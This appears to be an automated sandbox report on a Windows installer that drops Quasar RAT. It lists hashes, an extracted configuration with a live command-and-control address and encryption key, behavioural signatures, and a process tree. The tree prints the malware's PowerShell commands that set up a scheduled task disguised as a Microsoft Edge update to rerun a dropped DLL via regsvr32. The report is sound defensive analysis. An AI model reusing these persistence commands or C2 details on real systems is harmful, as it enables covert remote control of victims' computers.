Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-01-2025 17:28
Static task
static1
Behavioral task
behavioral1
Sample
soft 1.14.exe
Resource
win7-20241023-en
General
-
Target
soft 1.14.exe
-
Size
2.6MB
-
MD5
0c8c53fc87610174bd8d304940ed84dd
-
SHA1
e049d2b70beec23414f252d3aab26f179e1573bc
-
SHA256
eee98aabaf632f6d85b08f40401058696980c57a60bbf57ffae069e6ee1b827c
-
SHA512
7150b0f65b6bb01d8be8d36a49c08239950384aa4382bda387b8de733f3f4f0db9eabf148e85b9b11efaf60761be703a6c28fdfdc6df87b03db6fb96acc4380e
-
SSDEEP
49152:b+PPOOZeF0a/ICoVrIdEXZe1pVhZ88hfOKx/13ZvTIqab7SNudXjdTF:HOk0axoVrIuXytKtKTrROJF
Malware Config
Extracted
quasar
1.4.1
bild
147.45.44.184:4782
c3e182b5-304a-49a7-85b2-6d514cf6f590
-
encryption_key
7248469493201CDB45E041FBAB664BCC303EC021
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/3116-83-0x000000001C1B0000-0x000000001C4D4000-memory.dmp family_quasar -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation soft 1.14.tmp -
Executes dropped EXE 2 IoCs
pid Process 2176 soft 1.14.tmp 4744 soft 1.14.tmp -
Loads dropped DLL 8 IoCs
pid Process 2176 soft 1.14.tmp 2176 soft 1.14.tmp 4744 soft 1.14.tmp 4744 soft 1.14.tmp 4572 regsvr32.exe 3116 regsvr32.exe 2944 regsvr32.EXE 4652 regsvr32.EXE -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 8 powershell.exe 1532 powershell.exe 8 powershell.exe 3080 powershell.exe 4156 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language soft 1.14.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language soft 1.14.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language soft 1.14.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language soft 1.14.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 4744 soft 1.14.tmp 4744 soft 1.14.tmp 3116 regsvr32.exe 3116 regsvr32.exe 1532 powershell.exe 1532 powershell.exe 8 powershell.exe 8 powershell.exe 3116 regsvr32.exe 3116 regsvr32.exe 2944 regsvr32.EXE 2944 regsvr32.EXE 3080 powershell.exe 3080 powershell.exe 2944 regsvr32.EXE 2944 regsvr32.EXE 4652 regsvr32.EXE 4652 regsvr32.EXE 4156 powershell.exe 4156 powershell.exe 4652 regsvr32.EXE 4652 regsvr32.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1532 powershell.exe Token: SeIncreaseQuotaPrivilege 1532 powershell.exe Token: SeSecurityPrivilege 1532 powershell.exe Token: SeTakeOwnershipPrivilege 1532 powershell.exe Token: SeLoadDriverPrivilege 1532 powershell.exe Token: SeSystemProfilePrivilege 1532 powershell.exe Token: SeSystemtimePrivilege 1532 powershell.exe Token: SeProfSingleProcessPrivilege 1532 powershell.exe Token: SeIncBasePriorityPrivilege 1532 powershell.exe Token: SeCreatePagefilePrivilege 1532 powershell.exe Token: SeBackupPrivilege 1532 powershell.exe Token: SeRestorePrivilege 1532 powershell.exe Token: SeShutdownPrivilege 1532 powershell.exe Token: SeDebugPrivilege 1532 powershell.exe Token: SeSystemEnvironmentPrivilege 1532 powershell.exe Token: SeRemoteShutdownPrivilege 1532 powershell.exe Token: SeUndockPrivilege 1532 powershell.exe Token: SeManageVolumePrivilege 1532 powershell.exe Token: 33 1532 powershell.exe Token: 34 1532 powershell.exe Token: 35 1532 powershell.exe Token: 36 1532 powershell.exe Token: SeDebugPrivilege 8 powershell.exe Token: SeIncreaseQuotaPrivilege 8 powershell.exe Token: SeSecurityPrivilege 8 powershell.exe Token: SeTakeOwnershipPrivilege 8 powershell.exe Token: SeLoadDriverPrivilege 8 powershell.exe Token: SeSystemProfilePrivilege 8 powershell.exe Token: SeSystemtimePrivilege 8 powershell.exe Token: SeProfSingleProcessPrivilege 8 powershell.exe Token: SeIncBasePriorityPrivilege 8 powershell.exe Token: SeCreatePagefilePrivilege 8 powershell.exe Token: SeBackupPrivilege 8 powershell.exe Token: SeRestorePrivilege 8 powershell.exe Token: SeShutdownPrivilege 8 powershell.exe Token: SeDebugPrivilege 8 powershell.exe Token: SeSystemEnvironmentPrivilege 8 powershell.exe Token: SeRemoteShutdownPrivilege 8 powershell.exe Token: SeUndockPrivilege 8 powershell.exe Token: SeManageVolumePrivilege 8 powershell.exe Token: 33 8 powershell.exe Token: 34 8 powershell.exe Token: 35 8 powershell.exe Token: 36 8 powershell.exe Token: SeIncreaseQuotaPrivilege 8 powershell.exe Token: SeSecurityPrivilege 8 powershell.exe Token: SeTakeOwnershipPrivilege 8 powershell.exe Token: SeLoadDriverPrivilege 8 powershell.exe Token: SeSystemProfilePrivilege 8 powershell.exe Token: SeSystemtimePrivilege 8 powershell.exe Token: SeProfSingleProcessPrivilege 8 powershell.exe Token: SeIncBasePriorityPrivilege 8 powershell.exe Token: SeCreatePagefilePrivilege 8 powershell.exe Token: SeBackupPrivilege 8 powershell.exe Token: SeRestorePrivilege 8 powershell.exe Token: SeShutdownPrivilege 8 powershell.exe Token: SeDebugPrivilege 8 powershell.exe Token: SeSystemEnvironmentPrivilege 8 powershell.exe Token: SeRemoteShutdownPrivilege 8 powershell.exe Token: SeUndockPrivilege 8 powershell.exe Token: SeManageVolumePrivilege 8 powershell.exe Token: 33 8 powershell.exe Token: 34 8 powershell.exe Token: 35 8 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4744 soft 1.14.tmp -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4048 wrote to memory of 2176 4048 soft 1.14.exe 82 PID 4048 wrote to memory of 2176 4048 soft 1.14.exe 82 PID 4048 wrote to memory of 2176 4048 soft 1.14.exe 82 PID 2176 wrote to memory of 720 2176 soft 1.14.tmp 83 PID 2176 wrote to memory of 720 2176 soft 1.14.tmp 83 PID 2176 wrote to memory of 720 2176 soft 1.14.tmp 83 PID 720 wrote to memory of 4744 720 soft 1.14.exe 84 PID 720 wrote to memory of 4744 720 soft 1.14.exe 84 PID 720 wrote to memory of 4744 720 soft 1.14.exe 84 PID 4744 wrote to memory of 4572 4744 soft 1.14.tmp 85 PID 4744 wrote to memory of 4572 4744 soft 1.14.tmp 85 PID 4744 wrote to memory of 4572 4744 soft 1.14.tmp 85 PID 4572 wrote to memory of 3116 4572 regsvr32.exe 86 PID 4572 wrote to memory of 3116 4572 regsvr32.exe 86 PID 3116 wrote to memory of 1532 3116 regsvr32.exe 87 PID 3116 wrote to memory of 1532 3116 regsvr32.exe 87 PID 3116 wrote to memory of 8 3116 regsvr32.exe 90 PID 3116 wrote to memory of 8 3116 regsvr32.exe 90 PID 2944 wrote to memory of 3080 2944 regsvr32.EXE 101 PID 2944 wrote to memory of 3080 2944 regsvr32.EXE 101 PID 4652 wrote to memory of 4156 4652 regsvr32.EXE 104 PID 4652 wrote to memory of 4156 4652 regsvr32.EXE 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\soft 1.14.exe"C:\Users\Admin\AppData\Local\Temp\soft 1.14.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Users\Admin\AppData\Local\Temp\is-SAN6D.tmp\soft 1.14.tmp"C:\Users\Admin\AppData\Local\Temp\is-SAN6D.tmp\soft 1.14.tmp" /SL5="$70052,2280623,161792,C:\Users\Admin\AppData\Local\Temp\soft 1.14.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\soft 1.14.exe"C:\Users\Admin\AppData\Local\Temp\soft 1.14.exe" /VERYSILENT3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Users\Admin\AppData\Local\Temp\is-AQKQQ.tmp\soft 1.14.tmp"C:\Users\Admin\AppData\Local\Temp\is-AQKQQ.tmp\soft 1.14.tmp" /SL5="$B0042,2280623,161792,C:\Users\Admin\AppData\Local\Temp\soft 1.14.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\1iphlpapi.drv"5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\system32\regsvr32.exe/s /i:SYNC "C:\Users\Admin\AppData\Roaming\\1iphlpapi.drv"6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\1iphlpapi.drv' }) { exit 0 } else { exit 1 }"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\Admin\AppData\Roaming\1iphlpapi.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{DC48D64F-3E24-4D2F-E401-B86CEF862100}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
-
-
-
-
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\Admin\AppData\Roaming\1iphlpapi.drv1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\1iphlpapi.drv' }) { exit 0 } else { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3080
-
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\Admin\AppData\Roaming\1iphlpapi.drv1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\1iphlpapi.drv' }) { exit 0 } else { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4156
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD562ba4ea474aa0661cb364833cd6f342e
SHA1bedea24ce0ef32bd8396e3b8f1fc6c2f27d49420
SHA2562c470425abe0953386b291a5539ce6530beb77d03743356c6606de1332dedad5
SHA512b97f14afab17976e43fbb953bea4a1b1fb98f15efd9267fca7e67cf23ed53bdeb5b9b6d2e3b7fca7df858b9f1d154da62200d4819d2eeab39aa998352211f621
-
Filesize
1KB
MD512c844ed8342738dacc6eb0072c43257
SHA1b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7
SHA2562afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519
SHA512e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a
-
Filesize
1KB
MD571c4b1323b5c2b0b3dce79a418170c57
SHA1f2484755165cc812bd2017c3ff93d7aef8e9f642
SHA256b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872
SHA5129048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize
1.1MB
MD5bcc236a3921e1388596a42b05686ff5e
SHA143bffbbac6a1bf5f1fa21e971e06e6f1d0af9263
SHA25643a656bcd060e8a36502ca2deb878d56a99078f13d3e57dcd73a87128588c9e9
SHA512e3baaf1a8f4eb0e1ab57a1fb35bc7ded476606b65fafb09835d34705d8c661819c3cfa0ecc43c5a0d0085fd570df581438de27944e054e12c09a6933bbf5ce04
-
Filesize
13KB
MD5a813d18268affd4763dde940246dc7e5
SHA1c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4
-
Filesize
4.2MB
MD50eb9dd8cd99ba5cda1580cedd1337c47
SHA147d50257261756ee304375fa84531cde9f1b2d80
SHA256744ef584ca4ac58a3ee825f5ead1129753d6d44198b3b14a53e368b7d24e84ef
SHA5122e7c3cc9cdbca9776b1e4ffa004a761d40629e4e5c5626df73367e1f41f7c560d3ae496a0ea211db497d7437855e9686205fb32220e23fab30f8b489d232e25a